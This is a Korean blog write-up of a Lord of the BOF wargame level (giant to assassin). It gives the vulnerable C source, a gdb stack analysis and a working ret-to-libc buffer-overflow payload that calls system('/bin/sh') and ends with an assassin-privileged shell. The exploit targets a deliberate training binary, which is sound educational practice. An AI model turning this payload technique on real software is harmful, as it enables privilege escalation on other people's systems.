2017. 11. 20. 21:08ㆍSystemHacking/LOB(BOF원정대)
giant / one step closer
[giant@localhost giant]$ /bin/bash2
[giant@localhost giant]$ export SHELL=/bin/bash2
[ assassin.c ]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) { char buffer[40]; if(argc < 2){ printf("argv error\n"); exit(0); } if(argv[1][47] == '\xbf') { printf("stack retbayed you!\n"); exit(0); } => 스택 사용x if(argv[1][47] == '\x40') { printf("library retbayed you, too!!\n"); exit(0); } => 라이브러리 사용 x strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer+sfp hunter memset(buffer, 0, 44); } | cs |
[ Stack 구조 ]
buffer 40byte 초기화
saved ebp 4byte 초기화
saved eip no stack , no RTL
argc
argv[0]
* stack 이나 RTL을 이용하지 않고 Data Section 을 이용하는 기법입니다
* 어셈블리 명령어 " ret " 를 이용합니다
어떤 식으로 이용해야 할 지 메모리를 먼저 분석합니다
[giant@localhost giant]$ cp assassin assassin.cp
[giant@localhost giant]$ gdb -q assassin.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
... (생략) ...
0x804851d <main+173>: leave
0x804851e <main+174>: ret
(gdb) b *0x804851d
Breakpoint 1 at 0x804851d
(gdb) run $(python -c 'print "A" * 44 + "BBBB" + "CCCC" + "DDDD"')
Breakpoint 1, 0x804851d in main ()
(gdb) x/24x $ebp-40
0xbffffac0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffad0: 0x00000000 0x00000000 0x00000000 0x00000000
saved ebp saved eip
0xbffffae0: 0x00000000 0x00000000 0x00000000 0x42424242 <-- &ret로 변조
0xbffffaf0: 0x43434343 0x44444444 0x????????
&system xxxx argv1
[ Stack ]
saved ebp 0x00000000
saved eip &ret (=pop eip,jmp eip)
&system
AAAA <-- 쓰레기 값
&"/bin/sh"
왜 쓰레기 값을 넣는가 ?
system함수가 호출되고 프롤로그 부분을 실시한다
push ebp & mov ebp,esp
=> [ Stack ]
system's saved ebp
AAAA <-- ebp+4 ( saved eip )
&"/bin/sh" <-- ebp+8 ( argv1 )
=> system ( /bin/sh )
[ Payload 작성 ]
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
[giant@localhost giant]$ /tmp/find <-- 이전 게시글에 소스코드 있음 ( /bin/sh 위치확인 프로그램 )
"/bin/sh" is at 0x400fbff9
printf /bin/sh
[ &ret ]
[giant@localhost giant]$ ./assassin $(python -c 'print "A" * 44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "AAAA" + "\xf9\xbf\x0f\x40"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒@AAAA▒@
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$ whoami
assassin
bash$
'SystemHacking > LOB(BOF원정대)' 카테고리의 다른 글
| [17] zombie_assassin -> succubus ( Calling Function Continuously ) (0) | 2017.11.25 |
|---|---|
| [16] assassin -> zombie_assassin ( Fake EBP & leaveret ) (0) | 2017.11.20 |
| [14] bugbear -> giant ( RTL , execve ) (0) | 2017.11.20 |
| [13] darkknight -> bugbear ( RTL ( Return To Library ) ) (0) | 2017.11.17 |
| RTL 공격기법 원리 이해하기 예제 ( Omega Project ) (0) | 2017.11.17 |